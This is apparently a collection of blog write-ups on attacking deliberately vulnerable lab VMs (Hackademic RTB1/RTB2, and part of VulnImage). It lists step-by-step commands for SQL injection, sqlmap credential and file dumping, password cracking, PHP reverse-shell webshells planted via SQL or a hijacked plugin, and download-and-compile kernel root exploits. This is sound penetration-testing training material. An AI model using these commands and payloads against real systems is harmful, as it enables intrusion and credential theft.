g0tmi1k

[Video] Hackademic RTB2

2012-01-06T19:19:00.000Z

Links
Watch video on-line: http://blip.tv/g0tmi1k/hackademic-rtb2-5868340
Download video: http://www.mediafire.com/?pxf93lfq96a61ql

Brief Overview

Hackademic is the second challenge in a series of "boot-to-root" operating systems which has purposely designed weakness(es) built into it. The user's end goal is to interact with system using the highest user privilege they can reach.

Method

Scanned network for the target [Netdiscover]
Port scanned the target [UnicornScan]
Banner grabbed the services running on the open port(s) [NMap]
Interacted with the web server & bypass the login screen [Firefox & Burp Proxy]
Decoded hidden message [Burp Proxy& Xlate]
'Port knock' certain ports [Netcat]
Discovered & exploit an SQL injection vulnerably and download the configuration files [SQLMap]
Inserted a encoded web shell backdoor [Pentestmonkey's PHP-Reverse-Shell & Metasploit]
Escalated privileges via a vulnerable kernel version [CAN BCM exploit]
Accessed the 'flag' [Decoded image file]

Tools

Hackademic.RTB2.zip (MD5: 4c35e875e0ae2f872af6751f259b82b7).
A virtual machine (Example: VMware Player or Virtual Box).
Netdiscover – (Can be found in BackTrack 5).
UnicornScan – (Can be found in BackTrack 5's repository).
NMap – (Can be found in BackTrack 5).
Firefox – (Can be found in BackTrack 5).
Burp Proxy – (Can be found in BackTrack 5).
Xlate - optional
Netcat – (Can be found in BackTrack 5).
SQLMap – (Can be found in BackTrack 5).
PHP-Reverse-Shell – (Can be found in BackTrack 5).
Msfvenom – (Part of Metasploit & Can be found in BackTrack 5).
CAN BCM – (Found on exploit-db.com & Can be found in BackTrack 5).
Base64Decode

Walkthrough

To begin the attack the target needs to be located on the network. The attacker uses "Netdiscover" as it is able to quickly list all IP's, MAC addresses and known vendors. As the attacker knows the target hasn't spoofed their MAC address and are aware they are using VMware, the attacker has successfully identified the target due to only one VMware vendor being listed.

The attacker now focuses on the target by port scanning every TCP & UDP port. "UnicornScan" shows two open ports, TCP 80 (HTTP) & UDP 5353 (MDNS), which the attacker then verifies by using "nmap". During nmap's scan the attacker takes advantage of its scripting engine to detect which service is running on what port as well as to banner grab (which could possibly identify the software being used & its version). Depending on the outcome of the scan, nmap then executes any other script(s). In this instance the http methods was detected (which shows what options are supported by the HTTP server) along with the page's title. Nmap also tries to fingerprint the operating system (Linux 2.6.17-2.6.36).

By inspecting the web service using "firefox" the attacker is able to see if any web application is running and how they can interact with it. The web server responds and presents them with a page that has a message from the target's author and a login screen.

The attacker starts "Burp Proxy" and configures it along with firefox to allow burp to interpret & monitors the traffic between the attacker and the target. When the attacker enters an incorrect login, burp is able to capture the request and response allowing for the attacker to control and repeat using burp's "repeater" function. The attacker then repeats the same incorrect login request to verify the setup and then again however alters the password to reflex 'standard/common' values to bypass login screens. Editor's note: As it turns out, there isn't a backend database powering the login. The valid credentials have been hard coded into the source code (File: /var/www/welcome/check.php - Line: 17-20). Unless it's exactly the same (including case and spaces), it will not work!

$pass_answer = "' or 1=1--'";
$pass_answer_2 = "' OR 1=1--'";

if($_POST['password'] == $pass_answer or $_POST['password'] == $pass_answer_2){

After bypassing the login screen, the attacker is able to see the hidden message. When analysing the message, the attacker believes that the string has been HEX encoded, however due to the "%" which separates each value, the attacker uses burp's URL to decode the message. The output of the message still looks encoded to the attacker and repeats decoding the message, using burp's HEX mode. The output produce is now (partly) 'readable'. The attacker remembered nmap reported one port as closed & due to the message repeating the phrase "knock", they start to suspect that the rest of the encoded message relates to the technique called 'port knocking'. As the rest of the encoded message uses just '0' & '1' the attacker believes the message to be encoded in a binary format and attempts to decode it. The result produced looks familiar to the attacker and recognises some values as 'html', however due to the 'formatting/markings' burp is unable to decode it. The attacker takes the binary message and adds '&#' before every binary block (8 values) and ';' at the end of them too. This signals to burp to interpret the format differently and burp handles the message as html code. Upon decoding, the attacker sees a group of four values, all less than 65535 as well as believing the message is unable to be decoded any more.

The attacker uses the web site, "paulschou.net", to simplify the decoding process and is able to decode all the messages without having to alter the format at any stage to reach the same result.

The attacker scans the closed TCP port once more and by using "netcat" the attacker is able open to a port of their choice. They create a loop to connect to each of the ports which were decoded. Afterwards they repeat the same scan as before however this time they discover that the port response is open. Nmap reports that the service is HTTP, using 'Apache httpd 2.2.14 (ubuntu)', thus the same scripts are executed. http-robots has detected that there is a /robots.txt files located and reports which folders have been forbidden to be indexed by internet spiders.

Moving back to firefox, the attacker restores its proxy configuration as burp isn't needed and tries to connect to the newly discovered web service on the non-default port and is presented with a Joomla 1.5 instance. Upon exploring the web application they try to alter requested URLs and soon discover an MySQL error.

"SQLMap" automates the procedure of database injection dramatically speeding up the attack. The attacker starts to emulate the back end database and discovers software versions, the operating system, current database, current user and if they are a database administrator. Afterwards the attacker discovers the password hash for the database administrator. Next the attacker starts to explore and view the contents of the Joomla database itself and as a result discovers the user credentials for the web application. The attacker continues using the SQL injection by viewing the configuration files for the system. They start off by locating their own local configuration files for their web service (which is in the same path as the target). Upon reading the target's contents they soon learn the location of the web root for each web service running. Using this, the attacker is able to read the configuration file which is used to store the database credentials as Joomla needs to be able to interact with the MySQL database. The attacker uses the default filename for the Joomla's configuring file and then views the contents to reveal the credentials in plain text.

"PHPMyAdmin" is a web based GUI interface to manage MySQL databases, which the attacker discovers is running on one of the web services. Using the credentials gathered from the configuration file, the attacker is able to login as the database administrator. The attacker crafts an SQL query to attempt to write a PHP file into the root web folder and then access it using firefox. The result being the attacker is able to write files and execute PHP commands.

To be able to remotely interactive with the target, the attacker chooses to use "PHP-pentest-monkey" shell. The attacker creates a clone copy to work on and edits the file with their IP address as the shell will be remotely connecting back to them (and the shell needs to know where the attacker is), altering the port as well as removing the start & end PHP statements as they will already be in place. Upon updating the file, the attacker encodes the shell using base64 via "msfvenom" as this will not affect the SQL statement which will be used to create the file. Before triggering the web shell, the attacker uses netcat again to listen on the same port used in the web shell. Once everything is in place, the attacker calls the web shell, causing the target to execute the PHP function to decode the backdoor, making a connection back to the attacker. This gives the attacker command line access to the target with the same permission as the web server.

The attacker wishes to gain deeper access into the system by escaping privileges. To do so one common method is by exploiting the kernel (this ONLY works if it is the 'correct' version!). The attacker finds the target's kernel version, searches their local copy of a public exploit database "exploit-db" and discovers a potential exploit which matches the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' at the top of the file as it would stop the file compiling (it is common with exploits to have 'shout outs' here), copies a version to their local web root folder and gives permission to the file to make sure every user has access to the file. After everything is ready the attacker then starts a web server.

Controlling the target the attacker is able to locate a folder which they have permission to write to and execute files from. Afterwards they instruct the target to download the exploit code from the attacker and compile it. Upon execution the attacker has now got root access on the target's machine.

Game over

When they explore root's personal home folder, they notice the "key" file. The attacker notices the text file extension and views the content, upon doing so; they see the message has been encoded. Due to the use of "=" at the end of the message, it is a common sign that base64 has been used. The attacker pastes the message back into burp and decodes it. Seeing the mention of "png", hints the decoded value is an image file. After using the web site "opinionatedgeek.com", to decode and download the file, the attacker checks the file signature. It appears to be a valid png file format and opens it up to reveal the 'flag/proof', indicating the end goal.

Game over...again

Commands

netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.112 -p 1-65535 && us -H -mU -Iv 192.168.0.112 -p 1-65535
nmap -p 1-65535 -T4 -A 192.168.0.112   # Scans very quick, didn't need ETA via -v
BT -> firefox -> 192.168.0.112
BT -> BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Proxies -> burpsuite    # java -jar /pentest/web/burpsuite/burpsuite_v1.4.01.jar  
// Firefox -> Edit -> Preferences -> Advance -> Network -> Settings -> Manual proxy configurations -> 127.0.0.1:8080
// Firefox -> admin:password
// burp -> target -> site map -> right click -> send to repeater. Repeater -> request -> params. Username: admin Password: ' OR 1=1--' etc etc    # NOT 'OR 1=1--' (User can be anything)
Copy (black) test -> decoder -> url -> ASCII HEX 
echo "<binary>" | sed "s/   /;\&#/g;s/ //g;s/^/&#/;s/$/;/"   # Somehow its do-able in burp, Just can't figure it out! =(
// Burp -> Binary -> HTML
// Firefox -> Google -> ascii convert online -> http://home2.paulschou.net/tools/xlate/ -> HEX -> HEX -> Binary
nmap -p 666 -T4 -A -v 192.168.0.112
for x in 1001 1101 1011 1001; do
   nc -z 192.168.0.112 $x
done
nmap -p 666 -T4 -A -v 192.168.0.112
// firefox -> 192.168.0.112:666  -> List of content items...
cd /pentest/database/sqlmap
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -p letter --banner --current-db --current-user --is-dba
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --passwords
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dbs
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --tables -D joomla
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --dump -D joomla -T jos_users
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.112/files/_etc_passwd
find / -name apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/apache2.conf
tail /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_apache2.conf
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/etc/apache2/sites-enabled/000-default
grep -i "DocumentRoot" /pentest/database/sqlmap/output/192.168.0.112/files/_etc_apache2_sites-enabled_000-default
python sqlmap.py -u "http://192.168.0.112:666/index.php?option=com_abc&view=abc&letter=List+of+content+items..." -v 0 --file-read=/var/www/configuration.php    # Joomla default
cat /pentest/database/sqlmap/output/192.168.0.112/files/_var_www_configuration.php | grep -i pass -A 1 -B 1
// firefox -> 192.168.0.112:666/phpmyadmin/   # root yUtJklM97W
cp /pentest/backdoors/web/webshells/php-reverse-shell.php /tmp/bd.php
cd /tmp
nano +w bd.php    # edit IP address
msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=bd.php
nc -lvvp 1234
sql -> select "<?php msfoutput ?>" INTO OUTFILE "/var/www/backdoor.php";
#w; last; uname -a; id; ls -lah;
#netstat -antp
#ps aux
##ls -lahR /home
uname -r

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Privilege Escalation" | grep 2.6.3
head platforms/linux/local/14814.c
cp platforms/linux/local/14814.c /var/www/root.c
chmod 755 /var/www/root.c
/etc/init.d/apache2 start

ls -lah /
cd /tmp
wget 192.168.0.162/root.c
gcc root.c -o root
./root
whoami
id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lah /root
cat /root/Key.txt
// Burp -> Decoder -> Base64

#---Notes---
#Joomla: 1.5.22      # User: Administrator
#phpMyAdmin: 3.3.2.0
#curl http://192.168.0.112:666/phpmyadmin/changelog.php
#curl http://192.168.0.112:666/robots.txt
#curl http://192.168.0.112:666/htaccess.txt

Notes

When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
Some mistakes in the video are more obvious.
Instead of using "PHP-Reverse-Shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
It is worth downloading Joomla to be familiar with a default configuration.
The target uses DHCP to obtain an IP address.
The selection area to record was not in align when I recorded it

Song(s): Martin Solveig & Dragonette - Hello & Klaas meets Haddaway - What is love (Klaas Radio Edit) & Scotty - The Black Pearl (Dave Darell Radio Edit) & Trent Reznor & Atticus Ross - In the Hall of the Mountain King (The Social Network) & Charlie Clouser - The Final Zepp
Video length: 13:47
Capture length: 64:30
Blog Post: http://g0tmi1k.blogspot.com/2012/01/video-hackademic-rtb2.html
Forum Post: http://www.backtrack-linux.org/forums/showthread.php?t=47201&p=211962&viewfull=1#post211962

~g0tmi1k

[Video] Hackademic RTB1

2012-01-05T23:47:00.000Z

Links
Watch video on-line: http://blip.tv/g0tmi1k/hackademic-rtb1-5866864
Download video: http://www.mediafire.com/?9d45sfd7j8m531t

Brief Overview

Hackademic is the first in a collection of "boot-to-root" operating systems which has purposely designed weakness(es) built into it. The user's end goal is to interact with it and get the highest user privilege they can.

Method

Scanned network for the target [NetDiscover]
Port scanned the target [UnicornScan]
Banner grabbed the services running on the open port(s) [NMap]
Interacted with the web server & enumerated the web application [Firefox & WPScan]
Discovered & exploit an SQL injection vulnerably and download the configuration files [Exploit-DB & SQLMap]
Brute Force the user credentials for the web application [John The Ripper]
Hijacked a plugin for the theweb application with a web shell backdoor [Pentestmonkey's Php-Reverse-Shell]
Escalated privileges via a vulnerable kernel version [RDS Protocol exploit]
Accessed the 'flag' [Text file]
Discovered other 'interesting files' [Forensics analysis?]

What do I need?

Hackademic.RTB1.zip (MD5: C972E899A8B5A745963BEF78FBCAEC6F).
A virtual machine (Example: VMware Player or Virtual Box).
NetDiscover – (Can be found in BackTrack 5).
UnicornScan – (Can be found in BackTrack 5's repository).
NMap – (Can be found in BackTrack 5).
Firefox – (Can be found in BackTrack 5).
WPScan – (Can be found in BackTrack 5's repository).
SQLMap – (Can be found in BackTrack 5).
John The Ripper – (Can be found in BackTrack 5).
php-reverse-shell – (Can be found in BackTrack 5).
NetCat – (Can be found in BackTrack 5).
RDS Protocol – (Found on exploit-db.com & Can be found in BackTrack 5).

Walkthrough

To start the attack, the target needs to be located. By using "NetDiscover" it is able to quickly list all IP's, Media Access Control (MAC) addresses and known vendors in the same subnet. As the attacker knows that the target is using VMware and the target hasn't spoofed their MAC address, they notice only one VMware vendor therefore they can successfully identify the target.

The attacker now concentrates on the target's single IP address by port scanning every TCP and UDP port. "UnicornScan" reported one open port, TCP 80 (HTTP), which the attacker then verifies by using "nmap". During the port scan the attacker uses nmap's scripting engine to detect the service on the port (which is a web server) and banner grab (which possible enumerates software and it's version). Depending on the outcome of the scan, nmap then executes other scripts. In this instance the http methods were detected (which shows what options are supported by an HTTP server) along with the page's title. Nmap also tries to fingerprint the operating system (Linux 2.6.22-2.6.36).

By inspecting the web service the attacker is able to see if any web application is running and if they are able to interact with it. The web server responds when the attacker views the contents using "firefox". They are then presented with a page that has a message from the target's author forwarding them along to another page. Upon following the link, the attacker then views the blog. By viewing the page source code the attacker notices a possible web product that could be used to power the blog along with its version.

To confirm their findings the attacker installs and runs "wpscan", which is a vulnerability scanner specifically designed for the blogging software, wordpress. This program will automate the process of identifying known vulnerabilities using various different techniques. WPScan confirms its wordpress and its version along with a known vulnerability.

The attacker searches a public exploit database, "exploit-db", to see if they are able to find the exploit which was mentioned in wpscan. The database returned six exploits for wordpress. The attacker views the content of the first exploit code to discover how it functions. Editor's note: When executing the exploit and targeting the target, the exploit didn't work, same with the exploit reported by wpscan.

The attacker moves back to firefox and using the exploit code, manually tests for the same SQL injection vulnerability. Upon requesting the malformed URL with the injection code present, the attacker notices an SQL error message on the side, therefore confirming that the web application is vulnerable. The attacker then starts the process of SQL injection. To start off with the attacker needs to know the number of columns within the query that is to be injected into, which is done by increasing the value tested by 1 until they reach an error. Once the amount is known, they need to be able to locate the output of the SQL query on the page. Once this is done the attacker is able to start enumerating the back end database, by finding out the version, current user and current database in use. They are also able to read files locally (as long as the database service has permission to do so) on the server too, by encoding the filename into base64.

To speed up the SQL injection process, the attacker switches to "SQLMap" which automates a lot of the work. The attacker repeats what was done before manually now with sqlmap automatically to demonstrate how simpler the process now is. At the same time they collect hashed passwords to the database. The attacker continues by trying to view the web server configuration file(s). They start off by locating their local file, to see if it matches the targets and attempts to access it - which fails. They keep trying to access other possible default locations (source) until they are successful. After viewing the file the attacker now knows the local path of the root folder for the web server. From here the attacker wants to download the configuration file which is used for the blog software. As the blog needs to store the credentials to the database to be able to access it, the attacker tries the default filename for wordpress that contains the configuration. After sqlmap downloads the file, the attacker now has the credentials in plain-text to the MySQL database.

The attacker then uses the hash which was collected by SQLMap to validate the configuration file by using "John The Ripper" (which has to have the 'jumbo' patch (aka community - enhanced version) applied to support the MySQL hash format).

Now the attacker sets out to obtain the user credentials to the blog via the SQL injection. By viewing the wordpress documents, they are able to understand the Database Description. They discover there are 6 users registered and the fields used to store all their values. The attacker creates a simple loop to request each user's username and password (which is stored in a hash format). Editor's note: This could have been automated using SQLMap.

After the user's password hashes have been saved the attacker starts to brute force their passwords using a wordlist. After all the values have been tested against the hashes the attacker now has five user's passwords in plain-text. The attacker then checks the database to see each user's permission in relation to the blog. However they soon discover the one password which wasn't cracked is the administration password to the blog. They search the computer for another wordlist and attempt to see if that would crack the password - which it did. Editor's note: If the attacker wasn't able to crack the password, they could attempt to either alter another user to become an admin or create another admin account.

After navigating to the default location of the admin panel, the attacker is able to test out the acquired admin credentials. As a result the attacker now has full control over the blog software (as well as access to the database). The attacker notices that file uploads have been disabled. However instead of enabling them (as well as altering the allowed file types), the attacker opts to edit an un-used plugin instead. The justification of this is once the file has been edited, it's automatically removed from the plugin list so it is less obvious than altered settings which the attacker believes the admin would notice before wanting to enable the plugin again. Also the attacker believes there is a higher chance the admin will check the upload folder rather than checking the files in the plugin folder to the plugin list. The attacker chooses the plugin "textile 1" to replace. Editor's note: Instead of overwriting the file, it could be possible to amend the code at the end, leaving the existing functionality intact.

"php-reverse-shell" by pentest monkey is an interactive shell which is spawned when the PHP code is executed. The attacker copies the contents of the file and pastes it over the plugin. They then update the shell to have the attacker's IP address and a different port. Upon saving the updated plugin with the modified web shell code, when the attacker checks the list of plugins, they discover it has been removed (which also means they are unable to edit the file any more). As the nature is a reverse connection, the attacker needs to have a listener waiting on the same port to catch the request from the web shell when the PHP function is called from the target. The attacker sets up "netcat" to be the listener and then triggers their plugin. The attacker is then able to interact with the target with a command line interface running as the same permission as the web server.

The attacker now tries to escape privileges in-which to gain higher level of access into the system. One common method is by exploiting the kernel (ONLY if it is vulnerable!). The attacker finds the current kernel version out and again searches their local copy exploit-db. The attacker discovers a potential exploit that could work with the kernel version. The attacker checks that the exploit code doesn't contain any 'non-code' which would stop the file from compiling, then copies a version to their local web root folder, remove the 'non-code', gives permission to the file to make sure every user has access to the file and then starts a web server.

Controlling the target the attacker locates a folder which they have the permission to write to and execute files from. Upon entering such a path the attacker instructs the target to download the exploit code from the attacker and compile it. After executing the exploit the attacker has now got root access to the target. They then move to the root's personal home folder to locate & view the "key" file which was mentioned in the message at the start of the attack.

Game over

Upon exploring the rest of the file system, the attacker also noticed other 'sensitive' data on the target's machine. For example, bash commands which had been perversity been entered as root by another user earlier, as well as deleted files which were in the trash folder that hasn't yet been removed.

Game over...again!

Commands

netdiscover -r 192.168.0.1/24
us -H -msf -Iv 192.168.0.130 -p 1-65535 && us -H -mU -Iv 192.168.0.130 -p 1-65535
nmap -p 1-65535 -T4 -A -v 192.168.0.130    # -p 80
// firefox -> 192.168.0.130 -> Target (/Hackademic_RTB1/) -> Right click -> View source   # WordPress 1.5.1.1
apt-cache show wpscan
apt-get install wpscan
cd /pentest/web/wpscan/
./wpscan.rb
./wpscan.rb --url http://192.168.0.130/Hackademic_RTB1/
cd /pentest/exploits/exploitdb/
cat files.csv | grep -i wordpress | grep 1.5.1
perl platforms/php/webapps/1033.pl
perl platforms/php/webapps/1033.pl http://192.168.0.130/Hackademic_RTB1 2
cat platforms/php/webapps/1033.pl
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0'
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 1
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 2
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 3
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 4
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 order by 6
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,2,3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,version(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,user(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,database(),3,4,5
// http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(/etc/passwd),3,4,5
echo -n /etc/passwd | xxd -p -
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,load_file(0x2f6574632f706173737764),3,4,5
cd /pentest/database/sqlmap/
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/passwd
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_passwd
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --banner --current-db --current-user --is-dba
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --dbs
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --tables -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 -D mysql --columns -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/?cat=0 --password -v 0
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/etc/httpd/conf/httpd.conf
cat /pentest/database/sqlmap/output/192.168.0.130/files/_etc_httpd_conf_httpd.conf | grep DocumentRoot
./sqlmap.py --url=http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 --file-read=/var/www/html/Hackademic_RTB1/wp-config.php
cat /pentest/database/sqlmap/output/192.168.0.130/files/_var_www_html_Hackademic_RTB1_wp-config.php
cd /pentest/passwords/john
./john
./john /tmp/crackme --wordlist=/tmp/pass --format=MYSQL
#./john /tmp/crackme --show
firefox wordpress.org -> Database_Description -> WordPress 1.5   # http://codex.wordpress.org/Database_Description/1.5
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,count(*),3,4,5 from wp_users
http://192.168.0.130/Hackademic_RTB1/index.php?cat=0 union select 1,concat(user_login,0x3a,user_pass),3,4,5 from wp_users
curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users | grep page | sed 's/.*;\(.*\)&.*/\1/'
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass,0x3a,user_level%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*/\1/'; done   # Could even use the first SQL injection for count
for x in $(seq 1 6); do curl --silent http://192.168.0.130/Hackademic_RTB1/index.php?cat=0%20union%20select%201,concat%28user_login,0x3a,user_pass%29,3,4,5%20from%20wp_users%20where%20ID=$x | grep page | sed 's/.*;\(.*\)&.*/\1/' >> /tmp/wordpress; done

cd /pentest/password/john
./john /tmp/crack --wordlist=/pentest/passwords/wordlists/darkc0de.lst --format=raw-MD5

http://192.168.0.130/Hackademic_RTB1/wp-admin/   # GeorgeMiller // q1w2e3
#Plugins -> Hello Dolly -> Actiavte. Manage -> Files -> textile1.php
cd /pentest/backdoors/web/webshells/
cat php-reverse-shell.php    # Edit IP & port
nc -lvvp 443

curl http://192.168.0.130/Hackademic_RTB1/wp-content/plugins/textile1.php; exit

uname -a

cd /pentest/exploits/exploitdb
cat files.csv | grep "linux,local" | grep "Local Privilege Escalation"
head platforms/linux/local/15285.c
cp platforms/linux/local/15285.c /var/www/
nano /var/www/15285.c    # add "//" on line 1
chmod +x /var/www/15285.c
/etc/init.d/apache2 start

cd /tmp
wget 192.168.0.162/15285.c -O root.c
gcc root.c -o root
./root

id
ifconfig && uname -a && cat /etc/shadow &&  ls -lAh /root
cat /root/key.txt
#cat /root/.bash_history
#ls -lAh /root/.local/share/Trash/files

Notes

When starting the VM for the first time with VMware, select "I Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
Some mistakes in the video are more obvious.
Instead of using "php-reverse-shell" & "netcat", "PHP Meterpreter" & "Metasploit" could of been used.
It is worth downloading wordpress to be familiar with a default configuration.
The target uses DHCP to obtain an IP address.
The selection area to record was not in align when I recorded it

Song(s): Xploding Plastix - Kissed By A Kisser & Wolfgang Gartner - Illmerica (Extended Version)
Video length: 14:06
Capture length: 71:19
Blog Post: http://g0tmi1k.blogspot.com/2012/01/video-hackademic-rtb1.html
Forum Post: http://www.backtrack-linux.org/forums/showthread.php?t=47187&p=211925#post211925

~g0tmi1k

[Video] VulnImage - Manual Method

2011-12-17T21:12:00.000Z

Links
Watch video on-line: http://blip.tv/g0tmi1k/vulnimage-manual-5830689
Download video: http://www.mediafire.com/?38zd5afv4uadbxv

Brief Overview

VulnImage is an obscure (I can't even find a 'homepage' as such for it!) "boot-to-root" operating system which has purposely crafted weakness(es) inside itself. The user's end goal is to interact with it and get the highest user privilege they can.

The 'manual' tag is due to the way the login system is bypassed as well as privilege escalation (via Linux exploit development, covering fuzzing to metasploit module). Another method is located here.

Method

Scanned network for the target [NetDiscover]
Port scanned the target [UnicornScan]
Banner grabbed the services running on the open port(s) [NMap]
Bypass login system [Firefox]
Modified page requests to the web server [Tamper Data]
Manipulate the blog to upload an backdoor [Pentestmonkey's PHP-Reverse-Shell]
Brute forced directories & files on the web server [DirBuster]
Discovered a custom application running and downloaded the source code ['buffd']
Escalated privileges via a vulnerable kernel version [udp_sendmsg]

Exploit development starts at 5:28

Fuzzed the custom application until it crashed [NetCat & Python]
Verified and located which part of the buffer is overwriting the EIP address in the registers [Metasploit's pattern_create & pattern_offset & GDB]
Created shellcode to be executed [Metasploit's msfvenom]
Updated the buffer with the shellcode and verified everything so far [Python & GDB]
Final update of the buffer to include the ESP address [GDB]
Escalated privileges via the new exploit ['buffd']
Restart the target machine to verified the exploit
Created metasploit module [Geany]
Escalated privileges via the new exploit using metasploit ['buffd']
Restored the targets machine back to its original state
Instantly gained root access via the new exploit [metasploit]

What do I need?

VulnImage.zip (MD5: 8CB0E628AEB3C7E1F771764D07280655).
A virtual machine (Example: VMware Player or Virtual Box).
NetDiscover – (Can be found in BackTrack 5).
UnicornScan – (Can be found in BackTrack 5's repository).
NMap – (Can be found in BackTrack 5).
Firefox – (Can be found in BackTrack 5).
Tamper Data – (Can be found in BackTrack 5).
PHP-Reverse-Shell – (Can be found in BackTrack 5).
NetCat – (Can be found in BackTrack 5).
DirBuster – (Can be found in BackTrack 5).
udp_sendmsg – (Found on exploit-db.com & Can be found in BackTrack 5).
Python – (Can be found in BackTrack 5).
Metasploit – (Can be found in BackTrack 5).
A Text Editor (e.g. Geany) – (Can be found in BackTrack 5's repository).

Walkthrough

The first stage is to locate the target, which the attacker does by using "NetDiscover" as this quickly scans all the subnets for IP's, Media Access Control (MAC) addresses and any known vendors that relate to their MAC address. The attacker knows that the target is using VMware, as there aren’t any other virtual machines in use and the target hasn't spoofed their MAC address, therefore they have successfully identified the target.

The attacker then port scans the target as this discovers any services which are listening on the exposed interface. The attacker chooses to use "UnicornScan" as it is accurate & efficient whilst scanning at speed. The port scan shows there are 7 open TCP ports; 22 (SSH), 25 (SMTP), 80 (HTTP), 139 (NETBIOS), 445 (SAMBA), 3306 (MySQL) and 7777 (CBT). There is only 1 UDP port open, 137 (NETBIOS). The attacker then chooses to verify the TCP results by using "nmap" to do another port scan. At the same time, the attacker takes advantage of some other features built into nmap, such as its scripting engine. This enumerates the open port's protocols and services which have been detected, as well as banner grabbing. The attacker chooses to interact with the web service which is running on the default TCP port 80. The justification for this is because it is a very graphical, friendly and common way in allowing the end user to interact, because of this there could be lots of information which could be enumerated as well as poorly written code which could be taken advantage of.

The attacker starts "DirBuster" to brute force directories and files on the web server by connecting to a list of common paths used on a web server and to then analyse the HTTP response codes. As this takes a while, it is left running in the background.

The web service responds normally when the attacker interacts with it using a web browser, for example "firefox". The attacker then explores the web application structure by clicking through on links and soon sees the web service is running a blog, and, at the same time sees that two posts have been posted by the user, blogger. The attacker keeps on following links on the blog and soon is  presented with a login page for user profiles. The first thing the attacker looks at is the page source code, which they notice has a hidden field called "fname" and a value of "sig.txt", which appears to be a text document for signatures. Next they test the login system by entering data which wouldn't be correct as this can be used to see if the login system is working as well as the error message(s) for an incorrect login. The attacker uses the possible username, 'blogger' and the password, 'password'. The attacker then goes back and repeats the request, however; this time uses a different password to attempt to alter the login process. Editor's note: Before recording the video, the attacker noticed that phpMyAdmin was running on the web server (due to DirBuster). This is a GUI to manage MySQL databases, which are commonly used to validate credentials. The attacker then replaces their password with a MySQL statement in which to modify (by 'injecting' their code) the MySQL statement which has been hardcoded on the server side. This "password" will cause the original MySQL statement to return true, therefore it will login as the chosen user without the correct password being present. Editor's note: An explanation of the vulnerable code is below:

Original statement (Taken from /var/www/admin/profile.php, line 31):
    $sql = "SELECT * FROM blog_users WHERE poster = '$username' AND password = '$password'";

Expected input (user: blogger, Password: password):
    $sql = "SELECT * FROM blog_users WHERE poster = 'blogger' AND password = 'password'";

Injected input (user: blogger,  Password: ' or 1=1-- -):
    $sql = "SELECT * FROM blog_users WHERE poster = 'blogger' AND password = '' or 1=1-- -'";

In the MySQL statement the 'WHERE' clause needs two parts to equal true due to the 'AND' operator. The username is known and valid but the password is not. The reason why the injected input works is due to the 'OR' operator as this allows another value that will always be true, as 1 will always equal 1. Now the statement will return true, therefore logging in as blogger. The ending of the injected code, comments out any possible remaining queries in the original statement (as it turns out there isn't anything) plus there is no a need to fix the MySQL syntax.

